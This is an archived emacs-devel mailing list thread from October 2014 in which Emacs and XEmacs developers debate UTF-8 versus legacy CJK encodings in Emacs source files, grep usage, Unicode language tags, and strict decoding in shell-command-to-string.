>> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
>> 	monnier@iro.umontreal.ca, stephen@xemacs.org
>> 
>>     That distinction is quite blurred in latest Emacs versions.  E.g.,
>>     shell-command-to-string might call a process on a remote host and
>>     communicate with it via open-network-stream or some such.  There are
>>     several interactive commands already that use this feature.
>> 
>> The cases where their arguments for strictness are strongest
>> are the noninteractive ones that don't show the text to a user
>> for editing.
>
> I believe the commands that use shell-command-to-string are a good
> example of these cases.  That function is frequently used as
> infrastructure to query an external program about something, and the
> result is then used, at least in some cases, to decide how to proceed.

And treating undecodable bytes different from other input regarding
verification/sanitizing is going to make things more secure just how?
I should have thought that using several different mechanisms here is
going to increase rather than decrease the number of possible attack
vectors.  Or is the idea that any application is safe to be called as
long as we don't carry more than 200ml of liquids -- sorry, wrong
security theatre.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
@ 2014-10-14  7:58                                                                                   ` Eli Zaretskii
  2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  7:58 UTC (permalink / raw)
  To: stephen, dak; +Cc: emacs-devel

> Date: Tue, 14 Oct 2014 10:41:56 +0300
> From: Eli Zaretskii <eliz@gnu.org>
> Cc: dak@gnu.org, emacs-devel@gnu.org
> 
> So please believe me when I say that the files encoded in anything
> that isn't UTF-8 are those where using UTF-8 was impossible for some
> specific reason (not the reasons you mention above).  You can look up
> the related discussions in our list archives.

Here's the discussion I had in mind:

  http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
@ 2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  2014-10-14  9:21                                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14  8:34 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > >  > That's not true: we try using UTF-8 wherever possible.  The few files
 > >  > that don't use that simply cannot.
 > > 
 > > That doesn't seem to be true.  In fact many of the encodings
 > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
 > > a few indeed appear to be EUC encodings under an alias (eg,
 > > chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
 > > be encoded in UTF-8 are the Big 5 family -- and that's only if you
 > > demand bug-compatibility.[1]
 > 
 > First, you missed the file-local variables (the pattern you used with
 > Grep will only find the cookies on the first line).

So?  That's not a bug, since I only need to show existence of files
that use coding systems that *could* be translated to UTF-8 but
weren't.  I'm aware that not every file in a non-default encoding will
have such a cookie, and that the cookies may be mistaken, of course.

 > Btw, to find out how many of our files are in UTF-8 and how many
 > aren't, I would suggest to use tools that can explicitly tell the
 > encoding, rather than rely on Grep and on whatever you remember are
 > the ways of specifying a file's encoding.

Sure, but it's ironic that *you* are saying that to *me*, when you're
on the side saying that if you get the wrong encoding somehow you want
rawbytes.  Shouldn't you use tools that can explicitly tell you the
encoding? ;-)





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
@ 2014-10-14  9:21                                                                                     ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  9:21 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     emacs-devel@gnu.org
> Date: Tue, 14 Oct 2014 17:34:38 +0900
> 
> Eli Zaretskii writes:
> 
>  > >  > That's not true: we try using UTF-8 wherever possible.  The few files
>  > >  > that don't use that simply cannot.
>  > > 
>  > > That doesn't seem to be true.  In fact many of the encodings
>  > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
>  > > a few indeed appear to be EUC encodings under an alias (eg,
>  > > chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
>  > > be encoded in UTF-8 are the Big 5 family -- and that's only if you
>  > > demand bug-compatibility.[1]
>  > 
>  > First, you missed the file-local variables (the pattern you used with
>  > Grep will only find the cookies on the first line).
> 
> So?  That's not a bug, since I only need to show existence of files
> that use coding systems that *could* be translated to UTF-8 but
> weren't.

My original statement was that we try using UTF-8 "whenever possible".
I didn't define "possible", but the discussion to which I pointed has
the necessary details for that.

I also said that the non-UTF-8 files are a minority; for that,
counting the UTF-8 encoded files without missing any, no matter how
their encoding is determined, is important.

>  > Btw, to find out how many of our files are in UTF-8 and how many
>  > aren't, I would suggest to use tools that can explicitly tell the
>  > encoding, rather than rely on Grep and on whatever you remember are
>  > the ways of specifying a file's encoding.
> 
> Sure, but it's ironic that *you* are saying that to *me*, when you're
> on the side saying that if you get the wrong encoding somehow you want
> rawbytes.  Shouldn't you use tools that can explicitly tell you the
> encoding? ;-)

Irrelevant.  The issue to which you responded was whether the majority
of files in the Emacs repository use a certain encoding, which would
thus constitute a kind of "de-facto locale" for Emacs files.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
@ 2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14 10:06 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > Here's the discussion I had in mind:
 > 
 >   http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html

Oh, that's rich:

    The same can be said for etc/tutorials/TUTORIAL.ja.  This file
    should be shown in a proper Japanese font even for a user not in
    Japanese lang. env.

With all due respect, Dr. Handa, that is quite ironic.  You know as
well as I do what every Japanese textbook does to Chinese poetry.

Technically speaking, this kind of font choice is better done with
metadata.  For example, the user's default fonts might not make a
clear distinction among the different styles, or might be very
unrepresentative of one or more languages' typical style.  The fact
that Emacs *can* do it based on character set is kinda silly nowadays
because *nobody else* does.  The effort would be better spent on
improving CSS support.

And this again is amusing:

CJK variety: GB(元气,开发), BIG5(元氣,開發), JIS(元気,開発), KSC(元氣,開發)

I know[1] that there are consistent font style differences between
each pair of coding systems above, and those are nice to have.  But
what is funny is that *mostly those are not glyph differences in the
same character across languages, those are different characters in
Unicode!*  (Those are not 4 characters represented in 4 different
coding systems: there are at least 8 different characters involved.
And all but 2 of them are in fact representable in that venerable
subset of the Japanese standard, JIS X 0208.)

So, yes, I suppose that there are minor technical issues (I note that
TUTORIAL.ja didn't round-trip -- which is odd, and "CJK variety"
obviously can't).  But the assertions that these files "shouldn't"
converted to UTF-8 because the differences "cannot" be represented in
UTF-8 are primarily artistic, and a point of view with which many
users differ.  (Besides the practice of the Japanese Ministry of
Education, Culture, etc, mentioned above, my Chinese students often
prefer to use Chinese fonts for their Japanese papers because they are
"more readable", for example -- of course, they need to fix that when
they hand them in to Japanese professors, who find the Chinese fonts
"unreadable" -- and so it goes.)


Footnotes: 
[1]  I'm working in a TTY so I can't see them at the moment.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
@ 2014-10-14 20:03                                                                                 ` Paul Eggert
  2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-14 20:03 UTC (permalink / raw)
  To: Stephen J. Turnbull, Eli Zaretskii; +Cc: emacs-devel

On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote:
> in the Emacs tree "grep -r"
> is probably just a bug.

Although "grep -r" doesn't conformto POSIX, it is a handy GNU extension, 
and I use it a lot, both in the Emacs source tree and elsewhere.  GNU 
grep works reasonably well even with text files in the "wrong" encoding, 
and even with non-text files.  I don't expect grep to match UTF-8 
patterns to the corresponding EUC-JP text, because I know it doesn't 
translate.

Emacs's M-x grep command supports this usage well, and I don't see how 
it would be an improvement to call this usage a "bug" or for the Emacs 
(or grep) default to insist on strict coding correctness here.

Eli is correct that UTF-8 is the encoding typically used for text in the 
Emacs source code.  For more about this, please see "Source file 
encoding" in admin/notes/unicode.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14 20:03                                                                                 ` Paul Eggert
@ 2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
  2014-10-15  5:54                                                                                     ` Paul Eggert
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15  3:07 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:
 > On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote:
 > > in the Emacs tree "grep -r"
 > > is probably just a bug.
 > 
 > Although "grep -r" doesn't conformto POSIX, it is a handy GNU extension, 

It's not a question of conformance, it's a question of GIGO.  As you
yourself know:

 > grep works reasonably well even with text files in the "wrong" encoding, 
 > and even with non-text files.  I don't expect grep to match UTF-8 
 > patterns to the corresponding EUC-JP text, because I know it doesn't 
 > translate.

Oh, so you intentionally chose an example where you know it works, and
published that on a public mailing list, without warning the kids not
to try it at home?  Do you realize that although all Japanese computer
users occasionally experience mojibake, only a few understand the
mechanism and its implications for "simple" operations like grep?  I
suppose that goes in spades for the Chinese.  Consider searching for
元気 to find HELLO, "knowing" that Emacs uses the UTF-8 encoding!

 > Emacs's M-x grep command supports this usage well, and I don't see how 
 > it would be an improvement to call this usage a "bug" or for the Emacs 
 > (or grep) default to insist on strict coding correctness here.

Ah, so you've never lived anywhere but Kansas, Dorothy?  There are 1.5
billion[1] Asians who disagree that "grep -r しまった" is well-
supported by Emacs or grep in an environment with multiple encodings,
which is most of them (except where they've consciously instituted a
program of converting legacy documents to a common encoding).  That's
why the "Japanese patch" is also "the patch that would not die".

But that patch is not in any mainline program that I know of, because
accurate auto-detection requires knowledge of the target language so
it doesn't generalize (the "Japanese patch" assumes that the language
is Japanese, so it must be facing ISO-2022-JP, Shift-JIS, or EUC-JP,
and relatively recent versions added UTF-8 and BOM detection to that).
The patch is not able to distinguish EUC-JP from EUC-CN, for example,
in typical use where the designations of character sets to registers
is implicit.  (Distinguishing Shift-JIS from Big5 is highly but not
100% reliable, and of course distinguishing the language variants of
ISO-2022-7 is trivial because the control sequences specify character
sets to be installed in the GL register.)

 > Eli is correct that UTF-8 is the encoding typically used for text
 > in the Emacs source code.  For more about this, please see "Source
 > file encoding" in admin/notes/unicode.

XEmacs made that decision in 1998 (only using ISO-2022-JP).  I know
how this works.  The only difference between us is that I live in
Tsukuba, and I've spoken to Handa and Tomita inter alia about these
issues over beers (in Japanese as well as in English), and I've read
the extremist anti-Unicode tirades (in Japanese).  I don't know *why*
Dr. Handa sides with those maniacs (they claim that JIS incorporates a
mystic Yamato-damashii = "authentic Japanese spirit") although I
believe it's out of a genuine desire to support multiculturalism (via
his specialty of developing multilingual software).

However, like the Japanese patch, detecting culture and choosing font
for the same repertoire via encoding is a limited technique.  It only
works well for Han-using languages.  For example, the northern
European countries have different notions about positioning of
accents, which is apparently noticable to non-native speakers with
umlauts.  I suspect (though I haven't asked and don't have time to
search the library for wordwide newspapers) that the various
English-speaking cultures, the French, the Spanish, the Italians, and
the Germans have different notions of what constitutes readable or
beautiful typography -- it's definitely the case that the ASCII
characters in Japanese fonts "look Japanese" (to me, anyway).  But
good luck choosing fonts based on distinguishing ISO-8859-1 from
ISO-8859-1! :-)

Dr. Handa's approach to multiculturalism, then, is fundamentally
different from that of the engineers and scholars who have evolved
Unicode (more precisely, universal coded character sets and the
related encoding mechanisms) over the last 30 years or so, not to
forget the W3C which has concluded that (as long as conventional
glyphs are available for the character repertoire) font choice is
purely a presentation issue, and should be handled by markup.  Unicode
has even deprecated the use of "language tag" characters.  They do
remain in the repertoire, so could be used to deal with the issues
we are discussing.

http://www.unicode.org/faq/languagetagging.html
http://www.unicode.org/versions/Unicode6.2.0/ch16.pdf#G26419

Note that the language tags are isomorphic to control sequences as
used in ISO 2022 (except that being encoded in a block disjoint from
graphic characters, they're harder to screw up), so they introduce no
text handling issues for Emacs not already present in encodings using
ISO 2022 extension techniques.

So there you have it.  There is *no barrier* to converting *all* files
to conformant UTF-8, except a couple hours' hacking to make
`help-with-tutorial' and `view-hello-file' recognize language tags.[2]
It might be preferable to use a different approach, more conformant to
the Unicode/W3C party line, though.

Thank you for your persistence.  This discussion will greatly inform
my future work in XEmacs.  (I'm done discussing the issue for Emacs,
because I don't expect Dr. Handa -- who is more expert than I -- to
change his approach after all these years.  This is all just IMHO FWIW
YMMV -- and I suspect Dr. Handa counts his "mileage" in kilometers. ;-)



Footnotes: 
[1]  I don't know about Indic languages.  I'm under the impression
that these days they almost universally use Unicode in preference to
ISCII and such-like, so they may not have the issue.  If that is
incorrect, then you can make that 2.5 billion Asians.

[2]  Note that the limitation of the hack to those functions only is
consistent with the Unicode-recommended usage of language tags.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
@ 2014-10-15  5:54                                                                                     ` Paul Eggert
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-15  5:54 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel

Stephen J. Turnbull wrote:
> you intentionally chose an example where you know it works, and
> published that on a public mailing list, without warning the kids not
> to try it at home?

It's perfectly fine for users to try "M-x grep -r" at home.  It's not going to 
hurt them.  It's a common idiom, and lots of people use it every day.

> There is *no barrier* to converting *all* files
> to conformant UTF-8, except a couple hours' hacking to make
> `help-with-tutorial' and `view-hello-file' recognize language tags.

I already proposed that for most files, and nobody opposed the idea; see 
<http://bugs.gnu.org/13936#29>.  It's just that nobody has found the "couple 
hours'" hacking time.  Although it's low on my priority list, evidently it's 
higher on yours; perhaps you can propose a patch?  It's not a big deal if you 
can't; I expect eventually someone will get around to it.

> Ah, so you've never lived anywhere but Kansas, Dorothy?

I'm well aware of all the problems you mentioned.  None of them are valid 
arguments that it's a "bug" to use "grep -r" in the Emacs source directory. 
Conversely, it appears that you did not read the file admin/notes/unicode 
carefully; if you had, you would not be asserting so blithely that there is "no 
barrier" to converting all Emacs source files to UTF-8.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  5:54                                                                                     ` Paul Eggert
@ 2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
  2014-10-15 17:18                                                                                         ` Paul Eggert
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15  7:17 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:

 > It's perfectly fine for users to try "M-x grep -r" at home.  It's
 > not going to hurt them.

That's true for "hurt" == "must call 911".  There are very few
computer applications where bugs can result in 911 calls, though.
That's an awfully low quality standard you have there.

 > It's a common idiom, and lots of people use it every day.

Because they're monolingual English speakers, they can.  Others
cannot, unless they have an environment where there is a common coded
character set used for all textual content.  Even an American
searching for all instances of the CENT SIGN would be subject to
this bug.

http://www.thecomicstrips.com/store/add.php?iid=83467

 > Conversely, it appears that you did not read the file
 > admin/notes/unicode carefully;

"It appears that you have not studied Unicode carefully", as there is
nothing in that file that suggests anything but work is involved in a
conversion that loses no character information, since the external
coding system utf-8-emacs is available.  Even that can be dispensed
with, and pure Unicode used, with a little more work (use the PUA,
that's what it is there for!)

The metadata (language, for which original coded character set is a
proxy) can be provided either with a markup language (eg, XML or even
HTML) or using Plane 14 tags (but I wrote that already).

 > if you had, you would not be asserting so blithely that there is
 > "no barrier" to converting all Emacs source files to UTF-8.

I stand corrected.  No *technical* barrier.  It does require
nontrivial work: simply filtering through iconv is not enough.

There's also a political barrier: I believe that characters are
characters, and may be shared across traditional character set
boundaries, and that the presentation layer should specify
presentation.  Dr. Handa prefers that presentation be encoded in the
content.  I have no stomach for that argument.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
@ 2014-10-15  9:20                                                                                         ` Eli Zaretskii
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 17:18                                                                                         ` Paul Eggert
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15  9:20 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 16:17:52 +0900
> 
>  > Conversely, it appears that you did not read the file
>  > admin/notes/unicode carefully;
> 
> "It appears that you have not studied Unicode carefully", as there is
> nothing in that file that suggests anything but work is involved in a
> conversion that loses no character information, since the external
> coding system utf-8-emacs is available.  Even that can be dispensed
> with, and pure Unicode used, with a little more work (use the PUA,
> that's what it is there for!)

utf-8-emacs is a private encoding used and understood by Emacs alone,
so encoding Emacs files in that would make them unusable
(unsearchable, unreadable, etc.) with anything but Emacs.

As for using PUA, you have been told just a few days ago why this is
not going to work with Emacs.

> The metadata (language, for which original coded character set is a
> proxy) can be provided either with a markup language (eg, XML or even
> HTML) or using Plane 14 tags (but I wrote that already).

It is easy to suggest such major endeavors to other projects in which
you have no intention to become involved.  From the Emacs side, this
would be a terrible waste of resources, since the "problem" is already
solved in Emacs by other means, which work well, based on several
years of real-life experience.

>  > if you had, you would not be asserting so blithely that there is
>  > "no barrier" to converting all Emacs source files to UTF-8.
> 
> I stand corrected.  No *technical* barrier.  It does require
> nontrivial work: simply filtering through iconv is not enough.
> 
> There's also a political barrier: I believe that characters are
> characters, and may be shared across traditional character set
> boundaries, and that the presentation layer should specify
> presentation.  Dr. Handa prefers that presentation be encoded in the
> content.  I have no stomach for that argument.

The statement that UTF-8 is a de-facto Emacs "locale" still stands.
And so having Emacs behave in a way that makes it easy to work with
these files, including those few that for various reasons are encoded
differently, is still a valuable feature.  Your argument that Emacs
files have no single encoding and therefore there's no reasonable way
to support them is struck down.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
@ 2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 11:57                                                                                             ` David Kastrup
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 11:34 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > utf-8-emacs is a private encoding used and understood by Emacs
 > alone, so encoding Emacs files in that would make them unusable
 > (unsearchable, unreadable, etc.) with anything but Emacs.

And who in the world would care?  They're *all* Emacs Lisp source
code, not even documentation.  They're all in languages whose scripts
are in Unicode.  So most of the characters will be ASCII, most of the
rest will be in Unicode, and the few that aren't, you can probably
forget about reading or writing in any environment but Emacs or an
extremely idiosyncratic one that isn't good for anything except
reading and writing old Tibetan or Sanskrit encodings (but not both).

 > As for using PUA, you have been told just a few days ago why this is
 > not going to work with Emacs.

That is a bet I will eventually take you up on.  It may not be going
to work in Emacs, ever, but I bet I can make it work in XEmacs. :-)

 > Your argument that Emacs files have no single encoding and
 > therefore there's no reasonable way to support them is struck down.

I never made such an argument.  My argument is that Emacs is alone in
choosing this particular "reasonable way to support encodings", and
that makes it difficult to cooperate with other projects ... such as
Guile.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
@ 2014-10-15 11:57                                                                                             ` David Kastrup
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-15 11:57 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> I never made such an argument.  My argument is that Emacs is alone in
> choosing this particular "reasonable way to support encodings", and
> that makes it difficult to cooperate with other projects ... such as
> Guile.

"cooperate with" and "meld with" tend to raise substantially different
issues.  Emacs is perfectly well equipped to cooperate with a lot of
other projects not least of all because of its unusually diverse support
of encodings.  But of course it is a perfect nightmare to reimplement
Emacs on the basis of a system with a less polymorphic history.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 11:57                                                                                             ` David Kastrup
@ 2014-10-15 12:32                                                                                             ` Eli Zaretskii
  2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 12:32 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: eggert@cs.ucla.edu,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 20:34:31 +0900
> 
> Eli Zaretskii writes:
> 
>  > utf-8-emacs is a private encoding used and understood by Emacs
>  > alone, so encoding Emacs files in that would make them unusable
>  > (unsearchable, unreadable, etc.) with anything but Emacs.
> 
> And who in the world would care?

Those who use Grep etc. outside of Emacs.

> My argument is that Emacs is alone in choosing this particular
> "reasonable way to support encodings"

What other programs you are aware of that cover such a large set of
scripts and languages no matter what is the user locale?

> and that makes it difficult to cooperate with other projects
> ... such as Guile.

My point is that those other projects need to learn from Emacs first.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  6:24                                                                       ` Eli Zaretskii
  2014-10-14  7:48                                                                         ` David Kastrup
@ 2014-10-15 13:16                                                                         ` Richard Stallman
  2014-10-15 14:32                                                                           ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-15 13:16 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    I believe the commands that use shell-command-to-string are a good
    example of these cases.  That function is frequently used as
    infrastructure to query an external program about something, and the
    result is then used, at least in some cases, to decide how to proceed.

1. The scenario we've been told about is where the invalid UTF-8 gets
passed on to some other program.  I don't think any harm will come if
Emacs itself looks at the output of the command.  Emacs does not
generally get confused by raw bytes.

2. It would not be hard to make another function (which does strict
decoding) to recommend instead of shell-command-to-string for use in
Lisp code in certain cases.

3. It would be easy enough to make shell-command-to-string do flexible
decoding when called interactively and do strict decoding when called
noninteractively -- controlled through an optional argument.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
@ 2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 13:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > >  > utf-8-emacs is a private encoding used and understood by Emacs
 > >  > alone, so encoding Emacs files in that would make them unusable
 > >  > (unsearchable, unreadable, etc.) with anything but Emacs.
 > > 
 > > And who in the world would care?
 > 
 > Those who use Grep etc. outside of Emacs.

Well, no, because only those with a very special and very obsolete
environment would be able to search for those few characters using
grep, if they don't have Emacs.  The rest of the characters are in
Unicode, so can be searched as usual using the UTF-8 representation.

 > > My argument is that Emacs is alone in choosing this particular
 > > "reasonable way to support encodings"
 > 
 > What other programs you are aware of that cover such a large set of
 > scripts and languages no matter what is the user locale?

With Unicode support, *all of them*.  (Note: I didn't change from
encodings to "scripts and languages", you did.)

Of course, very few handle all of the *character encodings* that Emacs
does, but iconv and recode come close, or perhaps even exceed Emacs in
some areas.  Those programs, plus a little shell (oops, you're on
Windows, OK, *Python*), and you can do 99.44% of what Emacs can do as
far as handling file coding.

True, Emacs is a little more convenient in handling file coding, but
the majority of folks evidently think that is far outweighed by the
inconvenience of Emacs itself.

 > My point is that those other projects need to learn from Emacs first.

Could be you're right, but sadly, I doubt anyone is going to bother.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 13:16                                                                         ` Richard Stallman
@ 2014-10-15 14:32                                                                           ` Eli Zaretskii
  2014-10-15 14:43                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 14:32 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Wed, 15 Oct 2014 09:16:20 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     I believe the commands that use shell-command-to-string are a good
>     example of these cases.  That function is frequently used as
>     infrastructure to query an external program about something, and the
>     result is then used, at least in some cases, to decide how to proceed.
> 
> 1. The scenario we've been told about is where the invalid UTF-8 gets
> passed on to some other program.  I don't think any harm will come if
> Emacs itself looks at the output of the command.  Emacs does not
> generally get confused by raw bytes.

What Emacs gets from a program it can as easily send to another (or
the same one).

> 2. It would not be hard to make another function (which does strict
> decoding) to recommend instead of shell-command-to-string for use in
> Lisp code in certain cases.
> 
> 3. It would be easy enough to make shell-command-to-string do flexible
> decoding when called interactively and do strict decoding when called
> noninteractively -- controlled through an optional argument.

I envision complaints from users if we do that.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
@ 2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  2014-10-15 14:51                                                                                                   ` David Kastrup
  2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 14:36 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: eggert@cs.ucla.edu,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 22:22:26 +0900
> 
> Eli Zaretskii writes:
> 
>  > >  > utf-8-emacs is a private encoding used and understood by Emacs
>  > >  > alone, so encoding Emacs files in that would make them unusable
>  > >  > (unsearchable, unreadable, etc.) with anything but Emacs.
>  > > 
>  > > And who in the world would care?
>  > 
>  > Those who use Grep etc. outside of Emacs.
> 
> Well, no, because only those with a very special and very obsolete
> environment would be able to search for those few characters using
> grep, if they don't have Emacs.  The rest of the characters are in
> Unicode, so can be searched as usual using the UTF-8 representation.

You assume that Grep and the terminal will not choke on the
non-Unicode characters.  There's no basis for such an assumption.

>  > > My argument is that Emacs is alone in choosing this particular
>  > > "reasonable way to support encodings"
>  > 
>  > What other programs you are aware of that cover such a large set of
>  > scripts and languages no matter what is the user locale?
> 
> With Unicode support, *all of them*.

Treating UTF-8 as a byte stream doesn't constitute "support".

>  > My point is that those other projects need to learn from Emacs first.
> 
> Could be you're right, but sadly, I doubt anyone is going to bother.

Too bad.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 14:32                                                                           ` Eli Zaretskii
@ 2014-10-15 14:43                                                                             ` David Kastrup
  2014-10-16 18:12                                                                               ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-15 14:43 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Wed, 15 Oct 2014 09:16:20 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
>> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
>> 	monnier@iro.umontreal.ca, stephen@xemacs.org
>> 
>>     I believe the commands that use shell-command-to-string are a good
>>     example of these cases.  That function is frequently used as
>>     infrastructure to query an external program about something, and the
>>     result is then used, at least in some cases, to decide how to proceed.
>> 
>> 1. The scenario we've been told about is where the invalid UTF-8 gets
>> passed on to some other program.  I don't think any harm will come if
>> Emacs itself looks at the output of the command.  Emacs does not
>> generally get confused by raw bytes.
>
> What Emacs gets from a program it can as easily send to another (or
> the same one).
>
>> 2. It would not be hard to make another function (which does strict
>> decoding) to recommend instead of shell-command-to-string for use in
>> Lisp code in certain cases.
>> 
>> 3. It would be easy enough to make shell-command-to-string do flexible
>> decoding when called interactively and do strict decoding when called
>> noninteractively -- controlled through an optional argument.
>
> I envision complaints from users if we do that.

